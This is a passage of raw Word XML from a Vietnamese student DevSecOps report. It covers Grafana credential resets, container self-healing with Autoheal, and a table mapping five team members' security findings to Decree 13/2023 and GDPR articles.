          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tự động hóa đồng bộ và làm sạch cơ sở dữ liệu xác thực:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khi thay đổi mật khẩu trong biến môi trường, cơ sở dữ liệu SQLite hiện hữu của Grafana không tự động cập nhật bảng người dùng cũ. Do đó, đường ống CD tự động xóa bỏ volume lưu trữ SQLite cũ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker volume rm inlaneweb-monitoring_grafana_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) và thực thi lệnh cập nhật mật khẩu trực tiếp qua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>grafana cli admin reset-admin-password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ngay sau khi container khởi động thành công, bảo đảm 100% chính sách mật khẩu mới có hiệu lực tức thời.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>4.3. Tự động khởi động lại container khi gặp sự cố bằng Autoheal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Một hệ thống tự vận hành an toàn bắt buộc phải có khả năng tự phục hồi khi xảy ra sự cố đột ngột:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cơ chế thăm dò nội bộ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trong định nghĩa dịch vụ, chỉ thị </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>healthcheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> liên tục thực hiện truy vấn thăm dò nhịp tim nội bộ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>curl -f http://localhost/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> mỗi 30 giây một lần. Nếu ứng dụng web bị treo do tràn bộ nhớ hoặc tiến trình Apache bị khóa chết, container sẽ chuyển sang trạng thái không khỏe mạnh (unhealthy).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bộ điều khiển tự phục hồi Autoheal:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>willfarrell/autoheal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> lắng nghe các sự kiện trạng thái từ Docker Engine. Khi phát hiện một vùng chứa rơi vào trạng thái không khỏe mạnh quá 3 chu kỳ liên tiếp, Autoheal sẽ tự động kích hoạt lời gọi hàm API khởi động lại vùng chứa đó một cách an toàn mà không làm gián đoạn các dịch vụ khác trong cùng hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H1"/>
        <w:spacing w:before="280" w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 5: CÁC TÌNH HUỐNG SỰ CỐ VÀ TẤN CÔNG THỰC TẾ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Chương này mô tả chi tiết các sự cố kỹ thuật và nguy cơ bảo mật trong thực tế vận hành: từ việc phân tích cụ thể 5 vấn đề an toàn tương ứng với 5 thành viên nhóm theo chuẩn bảo vệ dữ liệu cá nhân, các lỗi mã nguồn bị người gác cổng tự động chặn lại, cho đến các sự cố hạ tầng và hành vi tấn công mạng trên máy chủ thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>5.1. Đánh giá an toàn ứng dụng và bảo vệ dữ liệu theo từng thành viên nhóm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện yêu cầu trọng tâm của bài tập nhóm về việc đánh giá an toàn ứng dụng trong việc đáp ứng yêu cầu bảo vệ dữ liệu người dùng, 5 thành viên trong nhóm nghiên cứu phụ trách phân tích 5 vấn đề an toàn độc lập trải dài trên các pha của chu trình DevSecOps. Các vấn đề này bao quát đầy đủ 2 nhóm lỗi cốt lõi: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>nhóm lỗi mã nguồn (Code)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>nhóm lỗi triển khai/vận hành (Deployment &amp; Operations)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, đồng thời được đối chiếu trực tiếp với các quy định pháp lý bắt buộc theo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghị định 13/2023/NĐ-CP (Bảo vệ dữ liệu cá nhân tại Việt Nam)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy định chung về bảo vệ dữ liệu GDPR (Châu Âu)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bảng tổng hợp đối chiếu 5 vấn đề an toàn ứng dụng của 5 thành viên</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Thành viên đảm nhiệm</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Vấn đề an toàn phát hiện</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Phân loại nhóm lỗi</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Pha trong DevSecOps</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Căn cứ vi phạm chính sách pháp lý</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Cơ chế thực thi kỹ thuật</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1. Nguyễn Giang Nam</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Trưởng nhóm)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Kiểm soát thay đổi mã nguồn và quản trị phân nhánh</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Triển khai &amp; Vận hành</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Pha Code / Commit</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Stage 1)</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Nghị định 13/2023:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Điều 13 Khoản 1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>GDPR:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Article 25 (By Design)</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Policy-as-Code</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Python Harness)</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2. Nguyễn Đình Hải</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Lỗ hổng tiêm mã SQL làm rò rỉ dữ liệu cá nhân người dùng</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Mã nguồn</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Pha Test / SAST</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Stage 2)</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Nghị định 13/2023:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Điều 9 Khoản 2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>GDPR:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Article 32 (Security)</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Security-as-Code</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Semgrep Taint Flow)</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3. Đào Xuân Mạnh</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Lưu trữ dữ liệu xác thực và mật khẩu gán cứng trong mã nguồn</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Mã nguồn</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Pha Build / Gate</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Stage 2)</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Nghị định 13/2023:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Điều 13 Khoản 2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>GDPR:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Article 5(1)(f)</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Security-as-Code</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(SonarQube &amp; Semgrep)</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4. Lê Đức Anh</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Mất an toàn cấu hình triển khai và nguy cơ lộ cổng cơ sở dữ liệu</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Triển khai &amp; Vận hành</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Pha Release / Deploy</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Stage 3 &amp; 4)</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Nghị định 13/2023:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Điều 13 Khoản 1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>GDPR:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Article 32 (Resilience)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Security-as-Code</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Config Validator &amp; IaC)</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5. Nguyễn Phương Mai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Thiếu hụt giám sát truy vết và ứng phó sự cố rò rỉ dữ liệu</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Triển khai &amp; Vận hành</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Pha Operate / Monitor</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Stage 4)</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Nghị định 13/2023:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Điều 17</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>GDPR:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Article 33 (72h Notice)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Security-as-Code</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(LogQL &amp; Auto-Healing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.1.1. Thành viên 1 — Nguyễn Giang Nam: Kiểm soát thay đổi mã nguồn và quản trị phân nhánh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thành viên phụ trách:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nguyễn Giang Nam (Trưởng nhóm / Kiến trúc sư DevSecOps).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bản chất vấn đề an toàn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong các dự án phát triển phần mềm, rủi ro an ninh nghiêm trọng hàng đầu bắt nguồn từ việc thiếu kiểm soát quá trình nạp mã nguồn: lập trình viên vô tình push trực tiếp mã thử nghiệm, bỏ qua các bước kiểm thử tĩnh, hoặc đưa mã chứa lỗ hổng vào các nhánh sản xuất mà không qua xét duyệt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân loại nhóm lỗi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lỗi triển khai, vận hành và quản trị hệ thống (Governance &amp; Operations).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha trong quy trình DevSecOps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha Code / Commit (Stage 1: Branch Policy Guard)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thực thi kỹ thuật:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Policy-as-Code (Chính sách an toàn dưới dạng mã nguồn)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Căn cứ vi phạm chính sách bảo vệ dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghị định 13/2023/NĐ-CP — Điều 13 Khoản 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quy định cơ quan, tổ chức xử lý dữ liệu cá nhân phải </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>"áp dụng các biện pháp quản lý, kỹ thuật phù hợp... để phòng chống hành vi vi phạm quy định về bảo vệ dữ liệu cá nhân"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Việc thiếu cơ chế kiểm soát mã nguồn đồng nghĩa với việc vi phạm quy trình kiểm soát thay đổi hệ thống công nghệ thông tin xử lý dữ liệu cá nhân.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>GDPR — Article 25 (Data Protection by Design and by Default):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bắt buộc các biện pháp bảo vệ dữ liệu kỹ thuật và tổ chức phải được tích hợp sẵn ngay từ khi bắt đầu thiết kế và phát triển phần mềm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách thức phát hiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
